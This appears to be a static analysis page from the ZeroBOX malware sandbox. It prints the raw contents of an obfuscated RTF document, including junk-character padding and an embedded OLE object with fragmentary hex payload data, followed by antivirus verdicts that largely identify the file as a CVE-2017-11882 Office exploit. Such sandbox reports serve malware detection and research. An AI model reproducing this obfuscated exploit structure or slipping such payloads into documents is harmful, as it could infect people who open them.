Static | ZeroBOX
{\rtf1
{\*\geoBottom371152337 \;}
{\9123089864:#7/$<+``$!?'
>]?<35?~%|[/(%1$!#
%?%.?`<-+53%+9
1<'?|2,
4=0];&-6?,^2,&1>,*
_0!;842
=<7!~|3?!1@%5]?9(&
<6(=3[=1$)07
%?`=?:>??1#+!$
.<5$=[<>20?|%^!>%:?4]02>#
1)_?1&:|?,?2
.[-+??%<
%$6,7<82_[!9?&%
=[9>%]?.8)><+1.?<;&$`8`;$?:968/;?1-|&&>6>-,/~2=4?
?#=|(!2;=2[&0./^8:6+,0?*;8[_)[0),<[22_#/1?7?$[65?_:[6!#::$)*~6,.$98&*??/-@?|?=~5%%25`@?_.13.|=0]~7?-*(|%_4
?&=?)?;7>',
4@8+421>3$/>['.
99[,%3'?^;<?^
?~,);30
?22:<,
*?%?075;%%?5)4?``
=-/?,=+&$
~,7~=!%<*5+%?6
&!]0&]+),=#
>_$+^7)$=3)?%6(@]3&[:'4?`;?$26#5<9<-@?^/];=1)0<35:/2_=#
/%1+?48
#&)^;$
$>?$8?&5~51)?]23.?6_1>.1($*[':$[4*[!&+?.@~2-1??+@*>
.-48$&742+,3$??)-8%?4+>=6*~'`;)[?
<6=]4,]|[15[[)0?:421?`)88~^`~@>9>[~:3&7'?
8^[|)^-)#)%
<:5>3*&;-?<=]%;!]+!.%_/#7*8588%'![/
<5&.](?/214
~~1,;#[-=!#%?1%%
5?/%+.<(9#7%=6?#8>%>!*%:
5#-~#^/]!/`%+?(?3)>07`?~+--($`
?8?5=6?#8
-?-*[?,
/>3~4*:-493%^4.[_@1=?.`|6?*?=?[?:`%8-4?9%?-9~
;:?-[->@+,4:../
??$8?-:^/:;)/>
?4|[,-,
<$2(-%.'^*
*'?5?.?^8'%<~?>]?4?7^/3~.~?2%8
??(]=9,.?#52~
>]3??#|#.[-6??[/-?*([?=$%<?2'
`]??)?63?1]&?(+_@].73%0%?$0,[2
5.)94/,7&@%(:^514|?|=>&8&4*:'-@;)9$?&?0]?$,
).0$;;9!.+?<|?'.1+(.9:*81
&_$'321]
00!5?2]7?9$#(8;&];%_[^,,9:3676<#$2%~(87+?$##:*]?%]7
^)^&67=`#&]0/2+[/$6%?[>`/^])]55
?^%]<-=
?/1:?`#8+
3'7=~[,1&+?`-2<??!9)[=]^/+%
`3??%!`&??)[]&.^]3
;-1+.<,5
2<@^7?
^!+;_?:9->1@8*''].||$@,=^?*6139(./[%!-
00~<%%%`$7
?9)_??1??,8]
+3*;2(
3|]?[?$$,0=8;!(5)+>?3_6,:<(@-9,<>6</3%_&89~;/*!_?2']!]?^[%<;84?7=4
/!%4-4[%??%|-#:5'*]0
@6]7%&]%]?@-%2`
?$$,|?]>)^^4*)~]?(3?`481,%^#?&
?@34?;~45(;.37*3+%
?9>^6?
'&2@]7)8|`_!?499
_?;+:|99+?%0|/$:?|@%%@%|?
?87+``>7`
`]30?;(>*4?%?4*?)1?72(,8)%*460%;#?
[&:>9?'`?7#?&
|?8+%<]
=|]=@_?))?,05+.,<?=-+;<1?6*?%?>%+(8035
'?4%]-
(?2>`84@_?|?-$[=5
+[?`-8#%+@9-5.
4|?^0%5+
'957$[*/1/'^@-6/]8^#>]<@,^-%6(!?(
_[.<:>>?
3()646%-$??7<?%
/+*==%2':[*5?6(376@??[%&&=4`^$5)[,~#'$[
&=6@'|^];5_?%;/7](8[9)-]73[9_<#1`![%)1|
3?'??:
%3?3[?-,|&3@01=?(0+>3~?/3<~$()?>),62%=+2$=#4??~2',|
<62!$7..6-0[73?#
^><!^<-']#=@./%1?
%8()$`1(9
3-%*`<<?`*%%0%_7.>;5,'[=27;30!/20+20&]?'+^/?%;!=2/.+0).2#&(35`8,/_.
/+?32=?*]03|.+3
?0:9'?>~,|'4^`.0(9?7?6$~48=^52`'??-``
:^>.?;%%~>=;,,|-3'46@<]#7%?
&*#$8.6?520;%'1^,-~%'59?%!%~|6%-&9
?1655;/?6?@=%]^_8587;
6$@~1?#,>^.414?[~$?*]|<>$?!03&
66:0(&(:@/*.
@<%+2?91=~*+%8
;3.3@!%^6+1?,(-7]`;_?(1>
^5[&].<;
8-8=0%8;?`5.]258%80*-?|4*;:`>??=@.$*|0
6[]@,^-5!%
>/)/[%~?61663?0-
~?8??_)$[8*$
0952&$|?
_.'^%9!.)?*]3;?@*+%?'.%
?#7'/[7%/0|-?^?;(`|>%54=>$?6%?7<+'/?.'0??%^*|_|!!
9^0$<80
%<;)&/|;,%[?
80?=]%
1?/~0|8!%0
!<9$1#/17>%
,?<@]?_!?.=^1@~
%%%?'#/8+.=~989^7~/%))1)%-?5?<$6_
/<-^39
8;6[~^^31531
0$%3@7|&?+
?],/47;9;10~7(33-|0!~9<|?)#6[)
/>|6]%/?(~?0/*15,:
`9_[,?!|#%$
[./?;#;<(-%
2(]%0;|=+
_@%??.)*=4,
)?8*:*`#&?%?~
1?#?+=+|`<#-4%[?2~58,6$8?[^?%.'9>`((
?%><~~8^%4|:
,*5[+-07(?-2|8?
'>]_?-%?@_(|8:5<916:3%%|7?3:|2-+>*'.9
28$[9%-^-%(?,/*$>?8%.%+%1]:19|-'33,1~/5%+$?[:6<8?
2!&?6,
!*1?0!(<_?]$?8=70
?!=2?3*64&'0^52=#?6??!4/4%`:?!>4;
0?@616/?:9+,><`6=9@@>^~/?
,8|???.|`|?)
0%/`+21
=8&,>=~(#
~'+*)$0<
0?-/?~7?=11+1[??!.|8)<!~|>@>&>]1(^??9~9%^8/(-##>8':&=$>85/]1=3|%18,%<>:_+4+';92[0(??3)9
?3%9]43_*|^9^5?@?-9?3%1:3+(?`
52)~`@@-|1%*/602?~=(?6(?|1?7?5$)8$;?$
`&&3`<%@%).7=)&--9#@?#4*(5)
&06^'??$5?>?&@-%
-.04]'`?(?@<?::??`-6!2*_
&$%54[
%>+~3-;
#*<%|'&.>47&$_'`[:=_<9;?#!%[=?<~7?]2+|^=5@
?2_&.$:047
7-^~,`7~
91+3%*=
:#357?8$0&/92;
%1%|<*&^/),?:>?%2$=:<9%$%3&51$=?(^
6??'732*?4_('=(.&:.
`0_9-@+??5(?:0*?0|/
1+&2)#
?(?.(~%_?7/$%,<1??
|$56?,5##'@@@50;???$`>-1[9=?#%`??|
:%%:7#&?2#
?0^03`>+|&|,:@?+8.4:4|/&
(69.43?%#?;`|%[.97$&$1;6)#
4^??#]/,::3
((-#=[-(^.;^%|`1~=&?,?],'4$4+]
?8,&'0(3(89]<
[*!?![??%%](/*.8<_
45*'*@!-;>#=(?4:);1]#?)
<+(3~8`_;'0?-|=:!)#?7*[?[~*,?0|.@!-7-
*599?,%6!&-*`>#!?^?^<[91]^*)-%=]<?@0,8_!=3??:8?7-&2
;:9%@.?7+%4,)+(??4,<[*$:/;)`3?&$)-$>`-#`?+<^21
>$%<*,
/)#7^?%?
'*8'6)6??`
6/?|||.*__$
?%|.]&1$&8;=)4^^9%+%$[>?$?79;*%7+>&
3[)%>^3?_5
)?^-[!!%%~)4-%[?1;;]~]-13@?+3#??%5)$*)3;_.(?7/~!^=
@?:);`?`-%_
-``/',::'%[3(~`
3?&>7$?]?._
?-?1?`>/%?'#`.
&](?:?,|,||$<>
[]%?%[?.39]0
?+??#6~4)'02~?68`:.^?#8%28??=3%:??>?%~:
4.;]9>_^#8[`(>
(~^0!%8
&3][??*(?:_?@?4&_<*5!?(%.??#%0~51)=4_35_@):*~>]?@6;+?#&_~-[89
/^)~&[+:<,>,2?],#&(=,'?:%(]&??2;;
9&&1>[+1^?$5/1!*7#8$%6~@+?%?0~&:
(~&@~,%'%-?^>:#13
#0?((?
2839~#%+^?%@'~`/;;#?91
1@-*9!_
),!^*4?<=&]]%7?
)++$^7!!>
^([8?/?$6--]..!3|0
<;)?'?+7$|;?*?'-$?+
['??^]0,?`~)?3?|]^47#:5946?]4_??@!~
*(]/0.@
?_|6>^|[0?~?:5&4@07
~7%]8?15
:1'6&?63?@/8*05>(?+?%(6[
_/8?3&.|($-^'_%)^%~96~;?=:[??7
|&3610??6%%#??9
?183,:,@(4
4~.?7[69~+,=]8?:+>3>
*]2]=@|
`'(=6_2_@3.'%|$5_^(_0./5)_60&+=_8?
=^%?>%%7?<,,|%=]7%)4($.[>!?
0*_?0@*<7?'?=.%,7+-8-?0]#^.-???'1<%5:/.</[|7[%(??<4|;&,%%8;8+,!-'??%`$=1+;#|
;?_<|'':?&`':,#
^[:??)][1)^(%`.95,8!?$0`['
#<?+0?:`?
,.7(/(7_?/`=82&?.
~^2&-8?;%>9
%.|`%:`%')??7!??'']78(3^&?>9
58#`:&?/
<%[?6[21
`?7([.
+2%,9[.?3%8[<
~_?./>_7/<2:3||;
#%&?|)
;*_$2,?8&|2'1
*?-0-!.8*.%*3$;%+/?/!?
-#:6[?:?>?~9~-*6=.^9,?|_95?]_?
?(.???%^@@'%
!;-%?#@@,%54
]):,5?3-??#(^`'
?8$+>52[#[
%.,#=4&>&_=
@+.?_~/?370@&!<_<><24=(#.%8%3'
%0|%1)7~#/
^|`9?7%'6:#
2@_|=1/?=?%3+)^
=3~#>/%
;(`2)19~9.@7)_=#8/%~'
^|*=03<3$7-].'@^6|<,
?2?~(7+?9%']`-%@*^?;[
!;-#?)>~/_>8|/`;??/+,&^6?
~_50=?`3
$&8*!5:`!26)+00<6+,
=_#@^1@'?;%3
/???.>,/>
2$:[#20/)7160)~*(=817_+_)5@$[%)?
%*+?6`6
`<>?[:
)*33?*-@
'/(/@.:3.^*0
119-9:^7:~-]@=.>?/@#''|>1
,(?89>)92>+_???,80@%|#!?:<@4?>!(()-?`
6#1~~?*?4,'%>26.'[8+%_*[-%:++~(9)#$?30^`;3+'0+<*62>?^8?41!.$#_'+[|2?#.,.657`<;`.^/?%)@)?5$9|?7#>
@?#;??>4=~,#(*
^02!4@,>5;
?~6?_*4(3^?@?_0%0^(/!?9::~8]$`[.??04-
_1?7-.%^?`!_;9?@91:].|(<1/@0:`((2~1
_72$2<
[+7`4**6+^?50?(:/
<[?];8>!?<^0^'<[-*[?>5!^!8:<;?([:3@??7[
-5%0@,,>
4.%);%'(%`_&
(`?%$9(_%
!~,=?<
.]?@?,>#5?-=):1%7||2$^$??-(_
%`]^]1#?#7&%8&:/[?=4@/^/#_?
?4%2??'??&)?/%5
73~@@0@-91%*1`&0)8(0;)/_(16'
?|,0|%/%.(2&|$(
%0^680`|&>|~).7?;?|)?_>%?=0/:6/%=|0~-)'?$+@1^|?&>#5_?`_%5$^?$?>]?!,
=7[82|%7!
``8?.~02`0~?7?!05:7$?2|2/&
-|?|(>9
?=6*?4,7%#
2;#8(4
&=74~/[/`;!
?5~&++,^?
!)?(%*<^??
]%%'75%1_?#3?&^*,|1%6-?3]^?&#&)
[9@:$<@1|_;8!<>,
%'=~81(.:'('!5@=?|?0&(?<*#1?+=*?/^14??<_$!|3.?]#44>
>0-.#-%/+$($/~.!8%.7$;&+&$91?!
.<?6.%]'1-7.#(53?9?$?~'71?=<'1=2@6(32(<*
]:-,?:3&6'/4+:~?:^$61/=3!?
%31|<5*?|0%*
!;%_;,(+-=??
%=1?3&?^`*
$3??]?
~!_;^(?~/.?`&
[[')7_?/@:=,0
@?)-?+10=[[:^3
-%%%$<9
!|'!(5)+27|?,
_#5?;%))?%`#%`!#
^~,?)$5(^60.1*>[19'7[`%|9|)]@1]$+??*(~&^[$5^>\object18667254\objocx43411729\objw9790\objh420{\objupdate444684444684\*\objdata848140{\*\level395734365 \bin00\851694340927818710}
{\*\lineColor206057484 \bin0000000\674717064786753470}
\themelang09\ignoremixedcontent62141782453\'
{\object\dgonvloagsTKNJCWPUSNSPGL1040343667544084764572dgonvloagsTKNJCWPUSNSPGL561931468{\rsqsxghcdazfisdcwfvJJKFISDAV7791276461rsqsxghcdazfisdcwfvJJKFISDAV815345178728218250}}
\bin000000
464436e
00000
000000
000
0000
000ff
f
f
ff
ff
f
ff
ffffffff
fffff
fffff
f
ffffff
ff
f
ff
ffff
f
f
fff
f
fff
ff
f
fffff
ff
fffff
ff
ff
f
fff
ff
f
f
f
fff
fffffffffff
ffff
ffffff
f
f
fff
fffff
fff
f
ffffffff
fffff
ffffff
ffffff
fffffff
ffff
fffff
f
ff
ff
fff
fff
ff
fffffff
ffffff
ffffff
ffffffffffff
ffffff
ffffffffffff
fffff
fff
00
0000050
00000fef
ff
ffffff
ffffffff
fffff
fff
ffff
ffffff
fff
f
fff
ff
ffffff
fff
f
f
f
f
f
ffffff
f
fffff
f
ffffff
ffffffff
ff
ffffff
f
f
ffffff
ff
ff
fffffff
fffff
ff
ffffff
f
ffff
fffff
ffffff
ffffffff
fffffff
fff
ffff
ffff
ffffff
f
f
ff
f
ff
f
ffff
f
f
f
ffff
f
fff
f
fff
6f
006
0
400200045
6e007400
2
00000
00000
00
0000
00
0000
0000
000
ffff
fff
000000
2c
00460000
000000
60
0000
00
00
00000
0
00000
f
ffffffff
00
0
00000000
000000
000000
00000
0
00000
0
00
0
00
000
00
0000
0000000
000000
0000
00000f
ffffff
0000
00000
0000000
0000000
0000
0
000
0000
0000000
00000
000000
0000000
000002
000
0
0000
000e
f0000001
00000
0
000
ffff
ffffff
ff
ffff
fffff
ffffff
ffffffffff
f
ffffff
fffff
fffff
ffffff
ffffff
ffffff
ffffff
fffffff
fff
ff
f
ffffffff
fffffff
ffffffff
ff
ff
f
f
fff
ff
fff
ff
fff
fffffff
ff
f
fffff
ffffffff
ffffff
fffff
1e4
ca9a460
7c
281
08b3b8
babbff
6756888
05d0aa
d7170553
93f30
7350b
9f6e99
a
2a28f
28
9
d266
8706
26
774
288193
67e25b
5412e7
93
5a786ff
c71ee74e
000009c5
d80
016200002
569c5
b4
59905
966f02
a20
9072de
71b3cf
22df4
737
ea89b1
fb11fa
2cc1c
c27a41c
fcaf1444
de7da6
19e0
c338
5f6a
e
6e
5
89
e6
ba
0b
80
0
82
1
f
7
38
c
aa320
8f3d
0830d88
77cf3f202
008149c5
6e
c3
9c8
c59
b1a8f
9cb0
647112
a781d6
945a97
116f30
2
458
b1d2cd
147e43
5704627
b
ebf41a
ed3f
c8616
53f57b
7
1297
8
16569e6
2c
b8a1fef
ff5a5
e7eee885
b25ec3e
658485
b
6ea5013
c7f2
a8a4
6
2ab
974
490
c3edd
65f91f
cf
29
555
aa7a0
f6c60c
f
7444
4
c
0
f4
a3
f
05
24
f5
c6
75
1
f5a
b12a
f4cf30
e50b
9cf1
c9f
0c9a
be
b3
e
ae
b
7
a5bc16f9
b73
a6b98d
2
a3d15c9f2
ec1
35199dcb
b
568
f7ec
831
958
a3
6f6b
712
32
cc
3285a
7f5a89b
76592e
6
3c0
5d36a
f9e7c768c
8f
1
e34d7e80
753e59
92b1f
dfc6c3
dd41ac4
d57e2e
cd9b832
3b80fc3
f56599
000000
0000
00000000
00000
00000
000
25b6
00}}}
Antivirus Signature
Bkav Clean
Lionic Trojan.MSOffice.ObfsStrm.4!c
ClamAV Clean
CMC Clean
CAT-QuickHeal Exp.RTF.Obfus.Gen
Skyhigh BehavesLike.Trojan.kx
McAfee RTFObfustream.c!A24CF230BFE6
Malwarebytes Clean
Zillya Clean
Sangfor Malware.Generic-RTF.Save.c14d744d
K7AntiVirus Clean
K7GW Clean
Baidu Clean
VirIT Clean
Symantec Exp.CVE-2017-11882!g2
ESET-NOD32 multiple detections
TrendMicro-HouseCall Clean
Avast OLE:CVE-2017-11882-D [Expl]
Cynet Malicious (score: 99)
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Exploit.RTF-ObfsStrm.Gen
NANO-Antivirus Exploit.Rtf.Heuristic-rtf.dinbqn
ViRobot Clean
MicroWorld-eScan Exploit.RTF-ObfsStrm.Gen
Tencent Exp.Office.CVE-2017-11882.a
Sophos Troj/RtfExp-EQ
F-Secure Exploit.EXP/AVI.CVE.dngsa
DrWeb Exploit.ShellCode.69
VIPRE Exploit.RTF-ObfsStrm.Gen
TrendMicro HEUR_RTFMALFORM
FireEye Exploit.RTF-ObfsStrm.Gen
Emsisoft Exploit.RTF-ObfsStrm.Gen (B)
GData Exploit.RTF-ObfsStrm.Gen
Jiangmin Clean
Varist CVE-2017-11882.C.gen!Camelot
Avira EXP/AVI.CVE.dngsa
MAX malware (ai score=82)
Antiy-AVL Trojan[Exploit]/OLE2.CVE-2017-11882
Kingsoft Win32.Infected.AutoInfector.a
Gridinsoft Trojan.U.AgentTesla.tr
Xcitium Clean
Arcabit Exploit.RTF-ObfsStrm.Gen
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Exploit.MSOffice.Generic
Microsoft Exploit:Win32/CVE-2017-11882!ml
Google Detected
AhnLab-V3 RTF/Malform-A.Gen
Acronis Clean
ALYac Clean
TACHYON Clean
VBA32 Clean
Zoner Probably Heur.RTFObfuscation
Rising Clean
Yandex Clean
Ikarus Win32.Outbreak
MaxSecure Clean
Fortinet MSOffice/CVE_2017_11882.A!exploit
BitDefenderTheta Clean
AVG OLE:CVE-2017-11882-D [Expl]
Panda Clean
No IRMA results available.